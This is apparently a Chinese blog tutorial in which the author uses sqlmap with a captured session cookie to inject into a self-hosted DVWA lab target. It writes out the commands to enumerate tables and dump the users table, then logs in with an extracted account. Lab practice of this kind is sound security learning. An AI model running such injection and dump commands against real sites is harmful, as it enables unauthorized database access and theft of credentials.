獸哥出品---->sqlmap注入,殺入靶機

 

 

Sqlmap 實踐----->懟自己的靶機  

 

 今天獸哥準備拿出來點乾貨給大家嚐嚐,是鹹是甜自任君品嚐

 

靶機之前已經文章說過 phpstudy 鏈接 dvwa 搭建一個環境

 

而後呢,我們要使用抓包軟件抓一下dvwa的cookie

 

 

讓我們先來看一下演示:

 

首先進入dvwa 將難度設置爲low(爲了演示方便)

 


 

wKiom1lkxaSRg0ZYAAF4LTwaoJs794.png-wh_50

 

 

接着呢 要使用用抓包 抓出dvwa登錄時的cookie

 

 

首先配置代理,在這裏呢  我設置代理端口爲默認:8080 如下圖所示

 

wKioL1lkxaWggiR8AADIscCpnZA480.png-wh_50

 

 

 

wKiom1lkxabwOfRpAADXxzsSklA363.png-wh_50

 

打開抓取按鈕  刷新頁面

 

可以看到  

 

Cookies爲  security=low; PHPSESSID=m04sk2chd2m6k381lcqrjukja4

 

所以 我們使用cookie 進行爆破測試

 

 

 

打開 sqlmap  讓我來一起進行試驗

 

 

我們有cookie 所以使用cookie方式注入

 

首先使用命令:

 

 

C:\Python27\sqlmap>sqlmap.py -u "http://192.168.20.34/dvwa/vulnerabilities/sqli/

?id=aa&Submit=Submit#" --cookie="security=low; PHPSESSID=m04sk2chd2m6k381lcqrjuk

ja4"

 

 

 

 

 

wKioL1lkxaaRYZlsAAEaVdpTMaE431.png-wh_50

wKioL1lkxafBi0LCAACre2WwypQ655.png-wh_50

 

 

 

我們可以看到 已經注入成功

 

接着我們爆出表--->

 

 

爆出 dvwa下的表名命令:

 

C:\Python27\sqlmap>sqlmap.py -u "http://192.168.20.34/dvwa/vulnerabilities/sqli/

?id=aa&Submit=Submit#" --cookie="security=low; PHPSESSID=m04sk2chd2m6k381lcqrjuk

ja4" -D dvwa --tables

wKioL1lkxbyTYOVfAAN6srODOK4816.png-wh_50

 

 

 

我們可以看到 dvwa下有 兩個表單 一個爲guestbook  一個爲 users  

 

很明顯 users下有我們想要的東西

 

 

所以 我們就爆出users下面的字段

 

使用命令:

 

C:\Python27\sqlmap>sqlmap.p-u    "http://192.168.20.34/dvwa/vulnerabilities/sqli/

?id=aa&Submit=Submit#" --cookie="security=low; PHPSESSID=m04sk2chd2m6k381lcqrjuk

ja4" -D dvwa --tables --dump -T Users

 

 

 

wKiom1lkxb2CKSGGAAFn96U3m84537.png-wh_50

 

 

喏,這時,我們可以明顯看到  users表單中 所爆出來的 賬號密碼一共有5組,這樣 我們隨便拿個賬號試驗一下看能否登錄進去

 

這個長得順眼 咱們就用這個:

賬號爲:pablo  密碼爲:letmein

wKiom1lkxb3yw4whAABG2zeKyfA140.png-wh_50wKioL1lkxb7zf1IrAAEJrJUCjqQ456.png-wh_50

 

 

 

Ok成功登入進去


發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章